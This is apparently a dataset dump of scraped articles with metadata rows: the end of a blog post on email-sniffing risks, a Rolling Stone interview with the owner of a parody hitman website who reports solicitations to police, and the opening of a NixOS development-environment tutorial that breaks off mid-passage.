By 2006, though, major email services were now supporting email wholly across SSL, so that this would no longer happen -- in theory. In practice, they still left the old non-encrypted ports open. Users could secure themselves, if they tried hard, but they usually weren't secured.
Today, in 2016, the situation is much better. If you use Yahoo! Mail or GMail, you don't even have the option to not encrypt -- even if you wanted to. Unfortunately, many people are using old services that haven't upgraded, like EarthLink or Network Solutions. These were popular services during the dot-com era 20 years ago, but haven't evolved since. They spend enough to keep the lights on, but not enough to keep up with the times. Indeed, EarthLink doesn't even allow for encryption even if you wanted it, as an earlier story this year showed.
My presentation in 2006 wasn't about email passwords, but about all the other junk that leaks private information. Specifically, I discussed WiFi MAC addresses, and how they can be used to track mobile devices. Only in the last couple years have mobile phone vendors done something to change this. The latest version of iOS 9 will now randomize the MAC address, so that "they" can no longer easily track you by it.
The point of this post is this. If you are thinking "surely my tech won't harm me in stupid ways", you are wrong. It will. Even if it says on the box "100% secure", it's not secure. Indeed, those who promise the most often deliver the least. Those on the forefront of innovation (Apple, Google, and Facebook), but even they must be treated with a health dose of skepticism.
So what's the answer? Paranoia and knowledge. First, never put too much faith in the tech. It's not enough, for example, for encryption to be an option -- you want encryption enforced so that unencrypted is not an option. Second, learn how things work. Learn why SSL works the way it does, why it's POP3S and not POP3, and why "certificate warnings" are a thing. The more important security is to you, the more conservative your paranoia and the more extensive your knowledge should become.
**Appendix**: Early this year, the EFF (Electronic Freedom Foundation) had a chart of various chat applications and their features (end-to-end, open-source, etc.). On one hand, it was good information. On the other hand, it was bad, in that it still wasn't enough for the non-knowledgeable to make a good decision. They could easily pick a chat app that had all the right features (green check-marks across the board), but still be one that could easily be defeated.
Likewise, recommendations to use "Tor" are perilous. Tor is indeed a good thing, but if you blindly trust it without understanding it, it will quickly betray you. If your adversary is the secret police of your country cracking down on dissidents, then you need to learn a lot more about how Tor works before you can trust it.
**Notes:**I'm sorta required to write this post, since I can't let it go unremarked that the same thing happened to me -- even though I know better.
## 2 comments:
Even with modern email encryption technology still betrays us.
Many mobile applications fail to verify the servers certificate allowing seamless man in the middle interception of data even an informed user would assume was safely encrypted.
It frustrates the hell out of me when I go to set up an account on some site and their password "requirements" are piss poor. Like they have a short maximum length or they don't support special characters. There's only so much you can do even when you know what is out there and best practices. I just had to set a password for a work-related benefit, someone that has my SSN and all my medical information aaaaand no special characters and 12 character max length. Of course, all these betrayals are really the result of decisions made by the people we trust to protect our information. Poor implementations, mis-configuration, and security as a second or third thought to implementing the latest features. Technology is morally neutral, people betray us.
Post a Comment | true | true | true | Kelly Jackson Higgins has a story about how I hacked her 10 years ago , by sniffing her email password via WiFi and displaying it on screen... | 2024-10-12 00:00:00 | 2016-05-18 00:00:00 | null | null | erratasec.com | blog.erratasec.com | null | null |
29,393,153 | https://www.rollingstone.com/culture/culture-features/rent-a-hitman-wendy-wein-murder-for-hire-sting-operation-1066756/ | How a Fake Rent-a-Hitman Site Became an Accidental Murder-for-Hire Sting Operation | Ej Dickson | # How a Fake Rent-a-Hitman Site Became an Accidental Murder-for-Hire Sting Operation
A few months ago, a 51-year-old woman from Michigan named Wendy Wein sent an email to a man she believed was named Guido Fanelli, the proprietor of a website called Rent-A-Hitman.com. “Got A Problem That Needs Resolving? With Over 17,985 U.S. Based Field Operatives, We Can Find A Solution Thats Right For You!” the website promised, along with a badge touting the site’s HIPPA compliance. Wein, indeed, had a problem that needed resolving: as she recounted in her email to Fanelli, there was a man who had ripped her off for $20,000 (her ex-husband, as authorities later discovered), and she wanted him taken care of. “I prefer not going jail. Thank you for your time,” the email concluded.
There was a small problem with this request. Guido Fanelli was not actually Guido Fanelli but Bob Innes, a repo-man in the Bay Area and the owner of Rent a Hitman, a website that has been used at least a dozen times to ensnare would-be assailants. Had Wein been paying attention, she would’ve noticed a few red flags that the site was not real: the fact that “HIPPA” stands for “Hitman Information Privacy and Protection Act of 1964,” for instance, or the section promising group and senior discounts. (The fact that the website openly offers the services of killers-for-hire is also a pretty significant tell). Nonetheless, these key facts eluded her, and as soon as she reached out to Innes, he alerted the authorities, who placed her under arrest; she was charged with solicitation to commit murder and illegal use of a computer to commit a crime, and is currently awaiting trial. (According to Monroe County first district courthouse records, her case is still pending, and her next hearing is scheduled for October 21st. Her court-appointed attorney did not respond to a request for comment.)
News of RentAHitman.com and the woman dumb enough to fall for it went semi-viral when it was reported last July, but *Rolling Stone *wanted to learn more about Innes’s operation and how, precisely, the website works. So we reached out via — what else? — the Rent a Hitman website, where “Guido Fanelli” responded immediately. We spoke to Innes about the origins of the site (“I really didn’t think that people were gonna be that stupid. Boy, did they show me,” he says), why Indonesians love murder-for-hire plots, and why you should be very, very careful when hiring a babysitter.
*This interview has been condensed and edited for clarity.*
**Can you start by telling me: Who are you?
**My name is Bob Innes. I’m an IT guy with a passion for being a kitchen detective, I guess you might say. In 1999, I went through the Napa Valley Police Academy, I graduated the police academy there with the ambition of going into law enforcement. I had applied at several agencies throughout the Bay Area here in California. And then in the following years, California had hiring freezes and budget cuts. All the positions were pretty much gone at that point. That’s when I started driving limousines to make some income while I would continue to look for a real job. I decided, well, it’s time to retool and find a profession that is always gonna be there. So in 2003, I enrolled in a business trade school in Northern California called Empire College. I went into IT, and took a program of information technology with an emphasis on the security aspect of it.
**What was the genesis of the Rent-a-Hitman domain name?
**One of the courses that I was taking was a penetration testing and risk analysis type course. Basically, you would try and penetrate a network and find out what the vulnerabilities of the network are, and would then work to patch up those vulnerabilities so it strengthens the network. There were a couple of my friends in that class, and we decided we wanted to start a business doing the penetration testing. One Sunday, we were playing paintball, and we were discussing business plans and a name for the particular company. And I came up with “Rent-A-Hitman.” Rent as in, hire us. Hit as in visitor traffic, analytics, and that kind of thing. It just sounded good. It was a play on words. So that was in February of ’05. And after graduation right around June, a couple of the guys ended up going to work for a different company. They moved out of state. I was left holding the domain name and trying to auction it off, but really there weren’t any buyers for that.
**How much did it cost, that domain?
**I have a receipt, it’s $9.20. That was February 5th, 2005.
*So after several months, I put the domain up for auction on one of the Web sites. I also put a simple little splash page, a little graphic that I made that said, ‘This domain is for sale. If interested, contact at RentAHitman.com’ with the email address. After about six, eight months of trying to auction it off, I wasn’t getting any serious buyers, no serious inquiries, so I decided to just hold on to it. About two and a half years later, I go into the inbox just to kind of clean it up and see what mail is in there, and to kind of revisit if somebody wants to buy it. Well, I was simply shocked when I saw the 250 to 300 emails in the account or in the inbox from people around the world that were seeking various services. Some of these emails were from people looking for asset extraction, to get money out of, like an individual or a bank or something. “How much to perform a hit in Austria? Do you service minors? Are you hiring?” One in particular was a lady out of the U.K. who was looking for a date. She wanted to have a hit man companion and learn the trade.*
**Prior to that, had you at any point realized that anybody might take the domain seriously?
**I really didn’t think that people were gonna be that stupid. Boy, did they show me. You always heard stories, even back then of people on the Dark Web going to find a hitman, and there was always Silk Road and all these other sites. But you never really heard of anybody doing it on the surface web. So I thought, you know, ‘Nobody’s really going to mess with this. Nobody is going to take it seriously.’ It was not my intention to set up a snare for some people.
**What was the first serious inquiry you got?
**It was from a female by the name of Helen. She was out of the U.K. but stranded in Canada. She had written an email to the contact email address, and it basically just it was a long and rambling email saying how she was screwed out of her father’s inheritance by three family members. She has no money. She has no place to live. She is stranded in Canada without a passport, so she can’t even leave. She wanted retaliation against her aunt, uncle, and one other family member. She provided physical addresses and whatnot. So when I first received that e-mail, I was helping my brother move from L.A. back up here to the Bay Area, so I was loading a U-Haul truck full of his belongings. I didn’t really take the time to read Helen’s e-mail in-depth. I just thought, this is a troubled person. I really didn’t give it much thought. Then she sends a second e-mail with “Urgent” in the subject line with more detail, more corroborating information. And I responded to that e-mail and I asked two simple questions. “Do you still require our services? Would you like me to put you in contact with the field operatives?”
**Why was that your immediate response?
**Because I could tell that this person was in a bad place. She obviously was serious about causing harm to people overseas. Her email was long and rambling and with great detail. This is a person that was in desperate need… The other emails, they were basically one line emails to the e-mail account, and there wasn’t a lot of information to go off of. Nobody was leaving names or addresses or anything like that. These were people just kind of feeling the water. And I didn’t respond, so they kind of just went away with this. This Helen email, I knew just reading her first e-mail that this is a person who wanted to have these people murdered. There was no doubt in my mind that was her intent. She responded back and said, yes, I’m staying at this hostel in Canada. Mind you, I’m driving up I-5 with a U-Haul full of stuff, and I have all these thoughts going through my head. “What am I getting myself into? You know, this lady is serious. I need to go home and start Googling and researching this.” So I did just that when I got home. I started printing out about 20 pages of details, names and addresses and Google satellite images and and all of the information was corroborated.
At that point, that’s when I went to the local police department and spoke with a friend of mine [who] at the time was a sergeant. And I told him what was going on. I gave him the information. He reached out and contacted the police department that had jurisdiction. They went out and they did a welfare check on this person to make sure that she was OK. And during the course of their investigation, they found out she was wanted out of U.K. on extraditable warrants for serious charges. So she was taken into custody. She spent 126 days in Canada before being extradited back to the U.K.
**Why did you automatically assume that this was a person who was serious about committing murder?
**If I didn’t get the email, somebody else would have got the email and taken different action. This was one of those extenuating circumstances that just had to be addressed. This was definitely a threat towards three people. So if I didn’t act, in my opinion, somebody else may have. And the results would have been a lot different.
**Where did the Hit Man Information Privacy and Protection Act of 1964 come from?**
In 2008, two years before I got this Helen request, I started working for an I.T. company, and we performed data recovery for public and private homeowners and businesses and governments and medical offices. And part of the requirements for performing data recovery for a medical facility is we had to maintain HIPPA compliancy. Everybody is familiar with HIPPA when you go to the doctor. So when I redesigned the website after this 2010 incident with Helen, I created a fictitious HIPPA for the Web site called the Hit Man Information Privacy and Protection Act of 1964. Now, it doesn’t mean anything. I mean, it’s purely fictitious. I also modified the Web site to include its own Web form so that people can fill out in their own words as to who, what, why, when, where they want done. There was no mention of any services, no mention of compensation or anything on the Web site. It was initially redesigned to just be so over-the-top fake, nobody could be that stupid to fill out this Web form and expect to contact a hit man. I wanted to make this Web site so glaringly obvious to the normal user that this is a parody…I wanted to make it obvious to law enforcement that, hey, this is not a real website. Yet people have gone to the Web site and solicited to have other people murdered.
**How many requests have you gotten?
**I run a spreadsheet of the requests that I’ve received. About 350 requests are on that spreadsheet. Not all of them are for murder for hire. Some of them are for people looking for assisted suicide options. Some of them are clearly hoaxes where they’re trying to prank their friend. Some of them are for people that are seeking employment, which I clearly can’t help them with. And out of the 350, about 10 percent are for those people that are seeking to cause harm to others. Now, of those, I ask the same two questions I always do. “Do you still require our services?” “Would you like me to place in contact with a field operative?” If I never hear back from them, maybe they have figured it out. Maybe they get a free pass on this one. But if they respond back with, “Yes.” OK, I’ll put you in contact with the field operatives. I’ll be your matchmaker.
**How do people find you? Like do you look at your analytics? Where do you get your traffic from?
**Most of the traffic is organic, meaning people are out there searching the Internet, Yahoo and Google and Bing and whatever, looking for a hit man. I’m not advertising the website anywhere. It’s clearly been picked up in the media. A lot of people have seen news stories on it. But the solicitations are still coming in. I’ve had a couple last week, I had one this week.
**Can you give an example of a request that you got?
**This is a request that was out of Kansas. This was from a female, Danae Wright. She said, under services requested, “shut down and take take them out to shut up the drama.” People were talking bad about her in her small town in Oakley, Kansas. She provided three names, which I was able to verify on Facebook. She wanted them taken out using “guns, bombs or anything or any way to remove them.” She additionally stated this was an urgent request. I asked her if she required our services and wanted to be placed in contact with the field operative. She said yes. That’s when I reached out to the Oakley Police Department, who forwarded this on to the Kansas Bureau of Investigation. The female was found guilty and sentenced to three years supervised probation after admitting to criminal solicitation to commit murder in the second degree. She had profiles on childcare-for-hire Web site. She wanted to watch people’s kids.
**So you follow up with these cases, like you keep track of them.
**She’s not even really one of the bad ones. There was another kid whose name is Devon Fauber. He was out of Augusta County, Virginia. This is a 20-year-old kid who was working at a seafood fish restaurant. He was upset with his ex-girlfriend and solicited to have his ex, her mother, and her stepfather murdered. But in addition, he wanted to have his ex-girlfriend’s infant kidnaped with the birth certificate and brought from Virginia to Texas so that he could start a family with this other female. This kid was so persistent. Again, I asked the two questions. He responded right away, said, yes, this is the address. Make sure you get the job done. He was so persistent over the next 10 to 12 days: “How come the job’s not done yet? I’ve given you everything you need to know about where they can be found. Remember, don’t kill the baby.” When I reported it to the Augusta County sheriff’s deputy, he said, OK, this guy is public enemy number one. They set up a sting. They made an arrest…. This is [also] a kid who also had two profiles on child care for hire Web sites in his small town. He wanted to watch other people’s kids again. You wanted to, you know, cook and do their homework with them. This is a predator and somebody that had to be stopped. So he is currently serving out his time. [Ed. note: Fauber pleaded guilty to two charges of solicitation of murder and was sentenced to 20 years in prison with 10 years suspended.]
**Do these people pay you?**No, when I say that I’ll have a field operative contact you, that’s for [law enforcement] to work out the details. When they perform the sting and when they sit down with the person, that’s for them to discuss, because if there’s any money brought to that little meeting, that shows intent as well. I don’t discuss any of that. That would change me from a state’s witness to coconspirator, and that’s a road I’m not going to go down. So I have to be very cognizant and careful about not getting into any kind of conversation about that.
**So he was expecting you to have killed his girlfriend and her family without having paid you?
**Yeah, apparently. [Laughs] Maybe he had coupons or something, I don’t know.
**Do you ever call the alleged targets and let them know they’re in someone’s crosshairs?**No. Once I report this information to the police, it’s up to the police to make that contact. And I do that because I don’t know what the full story is. I don’t know if the target is somebody who is vindictive enough to take matters into their own hand and go out and kill this guy. And that’s not something that I want to be weighed down with. That’s above my pay grade.
**What are the most common reasons that someone wants somebody else murdered?
**It’s been my experience that a lot of these are “ex-boyfriend, bad breakup, people need to move on” kind of thing. Here’s one right here: [
*reading from email*] “this girl has been a problem in my life for a long time. I just need someone to take her out of the picture, someone who can kidnap and capture and disarm the situation, please. Thank you.”
There’s a lot of different reasons. Some are trying to get somebody removed so they can be happy with somebody else. I’ve received requests for services from people that want their teachers harmed. Maybe they don’t like their homework. A number of the requests that I had gotten have involved students under the age of 18 or schools. They’ve named academic facilities. On those particular requests, I don’t waste my time with those two questions. I’ll Google some information. I’ll find out what I can about the teacher. I’ll find out what I can about the student, find out what I can about the school. But those are automatically reported. I don’t want to play that game, in this day and age with all the school shootings and all the bullying. I get peace of mind knowing that if if the school has been named or a juvenile has been named, maybe there’s an abuse issue that is far beyond anything I can tell just from an email…maybe they need medical help, psych help or whatever.
There was a case out of Anchorage, Alaska, from a 14-year-old kid who wanted his mom, dad, brother, and sister murdered. He gave instructions and said that he sleeps downstairs and in a bunk bed and that he wanted this done quietly. As fast as possible, that was reported to the Anchorage Police Department. They went out and did a welfare check on this kid and there was a history of abuse with this particular individual. So that’s, again, an example of why I would forward those on in and get the authorities involved fast on those.
**Are they mostly from men or women?
**You know, it’s about a 60/40 split. Mostly men. And that’s that’s kind of the way it’s shaking out to be, I’m not the best person at keeping statistics on that.
**How many people have you gotten arrested?
**There’s probably been about a dozen cases that have ended up in arrest with authorities….but I do want to tell you, the website itself has been seen in over 160 countries. I’ve received a couple of hundred e-mails from people in Indonesia who are seeking to have other people murdered in that country.
**Why Indonesia?
**Somebody in Indonesia did a YouTube video and they were talking about the dark web and they mentioned my Web site by name, which caused a surge of people to go on Yahoo and Google to search Rent a Hitman. They would end up on my page and they would then send a solicitation: name, address, the target’s social media, all this information caused a real surge in solicitation activity. I took it upon myself to contact the Indonesian consulate in San Francisco. I gave them one hundred of the e-mails. The most gripping part of this whole thing is that five of those e-mails were for their own president, Joko Widodo. They were assassination requests for the Indonesian president….it’s hard to say why it happens, but it was a real problem for a long time.
**Why do you give interviews if you’re trying to catch people committing a crime?
**I’m confident that what I’m doing is saving lives. The interviews and the news media that have gotten involved in this and aired stories, it’s not slowing down the number of solicitations that are received. The fact is that people are online, and they’re going to search on how to hire a hit man, and they’re ending up on the Web site. The internet is not a safe place. We know that. But I’m just one person trying to make it a little better for everybody.
**Are you worried about violence or retaliation?
**Not terribly, no. There’s danger in everything that people do every day. My personal safety I’m not too worried about. There’s a lot of dangerous people out there. I have to be cognizant of that. But this has become my personal mission. To save other people’s lives, who may never even know that they were in danger. And if I have to be the face of the Web site to get it out there and to help people, I have no problem doing that.
**Why do you think people still contact you, given how much coverage there have been of this? It’s very easy to Google this and see it’s a joke.
**Not everybody watches the news, reads the news. Not everybody listens to a podcast about this. I think some people, they get online [and search] “how to hire a hit man,” or “how to contact a hit man,” they see that first webpage. They see it’s HIPPA-compliant and they they feel compelled to leave their real information. It is beyond me why people do that, but they do. I don’t want to say it’s human nature, but these people are just not educated enough to know the difference, I guess.
**What has it taught you about human nature?
**I look at things a little bit differently than some, I guess, after these experiences. I don’t know what’s traveling through somebody’s head when they send an e-mail. I don’t know if they’re in deep despair. I don’t know if they’re looking for assisted suicide, I don’t know if they want their ex-husband or wife taken out, I don’t know what the situation is. I have to take every precaution and look at these e-mails and make sure I’m asking the right questions and researching this properly. There’s a lot of mental illness that’s out there. A lot of it shows up in my email. Let’s put it that way. A lot of it shows up from people seeking to cause harm to others. Everybody’s got their own story going on inside their head. And unfortunately, my website is like a magnet for those that are just hell bent on causing harm to others. | true | true | true | A dozen people have been arrested after reaching out to "Guido Fanelli," the fake proprietor of fake murder-for-hire site Rent a Hitman. | 2024-10-12 00:00:00 | 2020-10-15 00:00:00 | article | rollingstone.com | Rolling Stone | null | null |
|
22,167,546 | https://myme.no/posts/2020-01-26-nixos-for-development.html | NixOS: For developers | null | # NixOS: For developers
## Contents
After my brief introduction to `NixOS`
and the process of installing it, I
thought I’d dive into my experience with development on `NixOS`
. I failed my
initial intention to come with a follow-up post in quick succession to the
introduction, but this one dragged on for several reasons. Finding structure and
trying to be concise when discussing something as “generic” as `Nix`
turned out
to be quite challenging. Also, while still learning I found many of the things
I’d written in the past to be obsolete the next time I returned to writing.
## Again, why `Nix`
?
One of the main selling points of `Nix`
and `NixOS`
is its focus on
deterministic and reproducable builds, something all developers should strive
for in their projects. Many build and packaging tools have been putting
considerable effort into maintaining integrity, but normally this is localized
to libraries and dependencies in a single language1. It is still common for
programming languages to depend on system-wide compilers, interpreters and
shared libraries by default. No tool2 has pioneered and gone to the lengths
`Nix`
has to ensure reproducible builds, where not just the project’s direct
dependencies are locked, but practically *every* external dependency up to and
including the global system3.
`Nix`
does not do away with the build tools you would use for building and
deploying a project. Instead, it formalizes and encapsulates these tools in a
way that they too are locked to a given version. `Nix`
-compatible projects are
still built using the regular tools for that project’s ecosystem, however the
versions of these tools will be deterministic.
## Arrested development
`Nix`
as a language is quite minimalistic, yet built on sound functional
programming concepts. The result is a language which shines when creating
reusable functions, which again allows it to express build recipes (derivations)
for a wide variety of projects. `Nix`
does not directly *compete* with existing
build tools, but tries to *complement* and *combine* them. While the “core” of
the `Nix`
ecosystem may be small, the community has accumulated many conventions
and utilities with the aim to reduce duplication and boilerplate. This effort is
mainly contained within the nixpkgs package collection. And while the modularity
and reusability is impressive, the information overload when dealing with
`nixpkgs`
leads to a steep learning curve for newcomers.
I was of course expecting a learning curve when diving head first into `NixOS`
,
but I must admit there were several times when I questioned my decision to
switch. Learning curves imply a drop in productivity as you spend time learning,
when you instead could have been producing. It is not easy to value ongoing
efforts like these which have yet to produce measurable results. I was steadily
learning more about `Nix`
, yet I felt a growing desperation and despair because
despite my efforts, I had very little to show for it. Progress was slow.
In retrospect the goals I had to reach seem more well-defined than they were up front:
- Create project environments free of system dependencies.
- Change my development workflow to accommodate new restrictions and requirements.
- Manage my
*own*software using`Nix`
.
But to begin with I was a bit stuck in `NixOS`
, enjoying all the great software
built and maintained by others, yet having quite a bit of trouble getting
anywhere with my own projects.
## Turtles all the way down
While learning `Nix`
I’ve had many *aha* moments. One was when I finally
realized that `Nix`
isn’t a package manager in the normal sense used for
distributing binary builds. The fact that it can fetch pre-built derivations is
merely a consequence of its design. Primarily it is a *source distribution and
build* tool. I gradually grokked this as I got further involved with writing nix
expressions. Documentation might already state it clearly, but here I’m talking
about reaching enlightenment at a deeper level. Perhaps similar to being told
something as a kid, but still having to *experience* it first hand in order to
“get it”.
The `Nix`
expression for a derivation (a build unit) must state all of its
dependencies in order to build. This first and foremost includes its *build*
dependencies, but also its runtime dependencies. And here’s where it gets weird.
These dependencies are themselves merely other `Nix`
expressions for other
derivations. More concretely, if project *A* uses tool *B* in its build process,
its obvious that *B* must be built before attempting to build *A*. In most
environment I’ve encountered this typically means to use “some package manager”™
to go fetch *B*, typically not caring how it is built or distributed. In `Nix`
though, the dependency *A* has on *B* is declared by simply referring to the
recipe for building *B*. This means `Nix`
will simply go ahead and build *B* in
order to build *A*. And the same goes for all of the dependencies *B* might have
on other tools, even up to the `C`
library and compiler.
Nobody wants to waste precious CPU cycles (and time) on rebuilding the “whole
world” whenever we wish to build a project, which is why most build tools
implement caching in one way or another. By tracking all inputs to every
derivation, `Nix`
is able to implement a content-addressable cache which is
queried for pre-built derivations. This cache is also distributed, allowing
content to be fetched from trusted sources, primarily the `NixOS`
cache at
cache.nixos.org. It is populated by build servers, ensuring that the most
common/popular derivations are always up to date. Locally this doubles as the
`Nix`
store, in which all the artifacts built and *used* in the current system
or user profile reside.
In the end it’s the sole fact that by having deterministic builds and knowing
all the inputs involved, it’s possible to determine up-front which identifier
such an artifact will have in the `Nix`
store. And if it’s already there,
there’s no point in building it again. Et voilà, you get binary package
distribution for “free”!4 However, if a dependency is neither in the local
`Nix`
store, nor in one of the trusted binary caches, `Nix`
simply builds the
nested dependencies on demand. They’re just layers upon layers of `Nix`
expressions after all. Simply mind-bending!
## System integration
### Virtual environments using `nix-shell`
`Nix`
provides packages for many compilers, interpreters, libraries, and related
tools. Through `Nix`
we get a uniform way of installing dependencies, as opposed
to using several domain-specific ones, each with their own unique behavior.
`Nix`
also comes with `nix-shell`
, which starts an interactive shell based on a
`Nix`
expression, analogous to the way `virtualenv`
work in `Python`
. It either
builds or fetches cached builds of dependencies and adds them to the
`Nix`
store, before making them accessible in a subshell through modified
environment variables and symlinks. The user or system environment remains
untouched, which means projects can pick and choose developer tools at their
leisure, without polluting the user’s environment or requiring root-access.
Following is a short example of my system where neither `python3`
nor `node`
is
found in my `$PATH`
, then using `nix-shell`
to create an ad-hoc environment
where the `Python 3.7`
and `Node.js 10.x`
interpreters are available:
```
❯ which python
python not found
~
❯ which node
node not found
~
❯ nix-shell -p python3 -p nodejs-10_x
[nix-shell:~]$ python --version
Python 3.7.3
[nix-shell:~]$ node --version
v10.15.3
```
`Nix`
will download pre-built binaries of `Python`
and `Node.js`
on the first
run, then cache them in the `Nix`
store until garbage collected. The ```
-p
<package>
```
flag to `nix-shell`
is really convenient when you want to quickly try
something out, but for proper projects you’d want something more persistent and
declarative. Without the `-p`
flag `nix-shell`
will look for and evaluate `Nix`
expressions from files named `shell.nix`
, or fall back to `default.nix`
.
Invoking `nix-shell`
in the same directory then loads the environment in a
subshell:
```
~/project $ nix-shell
[nix-shell:~/project]$ node --version
v10.15.3
[nix-shell:~/project]$ python --version
Python 3.7.3
[nix-shell:~/project]$
```
We can also instruct `Nix`
to include `Python`
packages in our environment:
```
with import <nixpkgs> {};
{
mkShell buildInputs = [
(python3.withPackages (ps: with ps; [
requests]))
];
}
```
Where invoking `nix-shell`
gives us:
```
[nix-shell:~/tmp]$ python
Python 3.7.3 (default, Mar 25 2019, 20:59:09)
[GCC 7.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> requests
<module 'requests' from
'/nix/store/j70h9pxi8sn1sq0cy65k5y3knhrmyqb7-python3-3.7.3-env/lib/python3.7/site-packages/requests/__init__.py'>
```
`nixpkgs`
provides definitions for a large set of `Python`
packages. However, if
a package is not available it’s fully possible to pull it down using `pip`
. In
order to use `pip`
from within the environment it has to be added as a
`buildInput`
like any other. Furthermore, `pip install`
must either be invoked
with the `--user`
option to install dependencies under `~/.local/lib`
, or even
better using a `virtualenv`
. There are also ways of instructing `Nix`
about how
to fetch packages from package archives like pypi, typically through utilities
available in `nixpkgs`
or using external tools called `generators`
.
### Automatic environment activation using `direnv`
If you, like me, jump around a lot between projects and environments, the
inconvenience of having to invoke `nix-shell`
all the time quickly becomes
apparent. To automate this I rely on a tool called direnv, a companion for your
shell:
direnv is an extension for your shell. It augments existing shells with a new feature that can load and unload environment variables depending on the current directory.
Personally I integrate it with `zsh`
, which means that whenever I `cd`
into a
project directory tree, `direnv`
will ensure that the shell is setup with the
same environment you would get by invoking `nix-shell`
directly. Another
difference is that `direnv`
does not invoke a new sub-shell for the new
environment, but mutates the current process’ environment. This provides a
seamless experience navigating between different projects, not having to worry
about loading the correct `virtualenvs`
or switching between interpreter
versions using tools like `nvm`
or `pyenv`
:
```
~
❯ for prg in cabal ghc hlint; do which "$prg"; done
cabal not found
ghc not found
hlint not found
~
❯ cd ~/projects/nixon
direnv: loading .envrc
direnv: using nix
direnv: using cached derivation
direnv: eval .direnv/cache-.1926.5d6da42cf79
direnv: export +AR +AR_FOR_TARGET ... ~PATH
nixon on master [$!?]
❯ for prg in cabal ghc hlint; do which "$prg"; done
/nix/store/h433cxh423lrm3d3hb960l056xpdagkh-cabal-install-2.4.1.0/bin/cabal
/nix/store/zj821y9lddvn8wkh1wwk6c3j5z6hpjhh-ghc-8.6.5-with-packages/bin/ghc
/nix/store/1pwskgibynsvr5fjqbvkdbw616baw8c4-hlint-2.2.2/bin/hlint
```
For `direnv`
to know when and how to load an environment, it checks for the
existence of `.envrc`
files. These files are basic shell scripts evaluated using
`bash`
and should output expressions for setting environment variables. In the
case of `Nix`
I typically just invoke `use_nix`
in these files. The first time
an `.envrc`
file is found (and on changes) `direnv`
will ask for permission to
evaluate its content. This is a security mechanism in order to avoid
accidentally invoking malicious code. Once allowed, `direnv`
will continue to
load and unload the environment when entering and leaving project directory
trees.
```
~/tmp/project
❯ echo 'use_nix' > .envrc
direnv: error .envrc is blocked. Run `direnv allow` to approve its content.
~/tmp/project
❯ direnv allow
direnv: loading .envrc
error: getting status of '/home/mmyrseth/tmp/project/default.nix': No such file or directory
direnv: eval .direnv/cache-.1926.5d6da42cf79
direnv: export ~PATH
```
### The single `Emacs`
process conundrum
Back in my `vim`
days I’d typically launch the editor from within a `virtualenv`
in a shell, or at least starting in a project directory. Typically I’d have a
`tmux`
session for each project, a single `vim`
for that project in one pane,
and potentially several shells in other panes. When switching to `Emacs`
I
quickly got used to using projectile for switching between projects in
combination with perspective to provide workspaces for each project. This keeps
buffer lists and window layouts tidy and organized while working on multiple
projects in a single `Emacs`
process.
`Emacs`
uses a single variable for the execution path (`exec-path`
) and other
similar globals defining environmental values, which ultimately affect how
`Emacs`
will spawn external commands like compilers, linters, repls, and so on.
Naturally `Emacs`
won’t be able to launch these tools if they aren’t in the
`$PATH`
, and so these globals have to change when switching between projects.
This can be done manually by invoking commands, or automatically by hooks
triggered when switching between buffers. I was already using plugins like
pyvenv to switch between `virtualenvs`
in `Python`
projects. Most `node`
-related
plugins already support finding tools in `npm bin`
.
I started off looking for solutions which would allow me to keep my “single
process `Emacs`
”-based workflow. There are `direnv`
plugins for Emacs which
loads the project environment on file/buffer changes in `Emacs`
. Unfortunately,
after using `emacs-direnv`
for while I came to realize it wasn’t the solution I
wanted. The main issue with the `direnv`
plugin for `Emacs`
is that environments
are loaded automatically, while this is typically what you want, I found that
switching between buffers `Emacs`
would keep evaluating and updating the
environment. In the end this caused the editor to feel slow and unresponsive. A
deal-breaker!
Biting the bullet, I moved on to a workflow centered around having one `Emacs`
instance per project I was currently working on. I dropped my single long-lived
`Emacs`
sessions in favor of multiple sessions, each running within the project
environment set up by `nix-shell`
. It ended up with me firing up and shutting
down `Emacs`
much more often than before, as well as having to find the correct
editor instance for a certain project. This quickly started to annoy me in the
same way using a slow `direnv`
did. If only I could make the first approach
faster…
Turns out I wasn’t the only one looking for this and I eventually stumbled on an implementation of the `use_nix`
function used by `direnv`
. This provided a
significant performance increase by *caching* the result of evaluating
`nix-shell`
. Another benefit of this function is that it also symlinks the
environment derivation into `Nix`
’s `gcroots`
. Don’t worry, this basically means
that the artifacts required by the development environment won’t be garbage
collected when cleaning out the `Nix`
store using `nix-collect-garbage`
.
Even more time passes, and I became aware of a new tool built by Target, called
lorri. It is basically a daemon you can run in the background, building all your
environments as their expressions or dependencies change, while also ensuring
they are not garbage collected. I have yet to start using `lorri`
myself mostly
out of laziness, but I must say it looks very promising.
## Defining development environments
### Installing my own tools
In `Nix`
it’s important to distinguish between software intended to be used as a
dependency, like libraries, compilers, and so on, and *end-user* software, which
can be command line tools and GUI applications. While libraries and developer
tools should only be available from within any given project depending on them,
end-user software should be accessible from a user environment. I do develop a
few end-user tools that make my life easier, and so I had to figure out how to
best install these projects into my user profile.
Both `stack`
and `npm`
, and many other package managers5, are able to
install software into a “global” location. The `stack install`
and ```
npm install
--global
```
commands allow installing not just upstream packages, but also locally
from the same machine. Even though this was the way I installed my own software
on other operating systems, it was not the way I liked to do it on `NixOS`
. In
my opinion it’s a smell when you have to invoke several different tools to not
only install software, but also figure out what you’ve already installed. Some
tools do not even *track* what they installed, forcing you to manually go
through and remove stuff from you `~/.local~`
.
`Nix`
resolves these issues in one go, at the cost of having to figure out *how*
to create *proper* `Nix`
expressions for `Python`
, `JavaScript`
, and `Haskell`
code bases. Luckily, `nixpkgs`
has us covered, normally providing a single
function doing what you want. Some `nixpkgs`
functions also wrap `Nix`
generators like `callCabal2nix`
, saving you from having to run these tools
yourself. It took me a while to figure out it was `callCabal2nix`
and
`buildPythonApplication`
I wanted for most `Haskell`
and `Python`
projects,
respectively. I have yet to make an attempt at installing any of my `JavaScript`
tools on `NixOS`
.
### A quick note on generators
I’ve mentioned that `Nix`
doesn’t stop you from using package managers like
`pip`
and `yarn`
from within a project environment. The downside is that `Nix`
has no knowledge of what these tools are doing, and so cannot ensure the same
guarantees as if it knew about the artifacts these tools create (or fetch). It
is possible to use these other tools to fetch or build the software we want,
*then* inform `Nix`
about the artifacts, which is then able to add these to the
`Nix`
store.
Since package managers normally operate based on existing dependency meta-data,
it’s possible to automate the process of listing out the dependencies,
performing the build steps for each, adding artifacts to the `Nix`
store, and so
on. Tools that automatically generate `Nix`
expressions from some input are
called *generators*. The output of these generators are `Nix`
expressions which
can then be saved to file and evaluated by `nix-build`
and `nix-shell`
. In the
case of `nixpkgs`
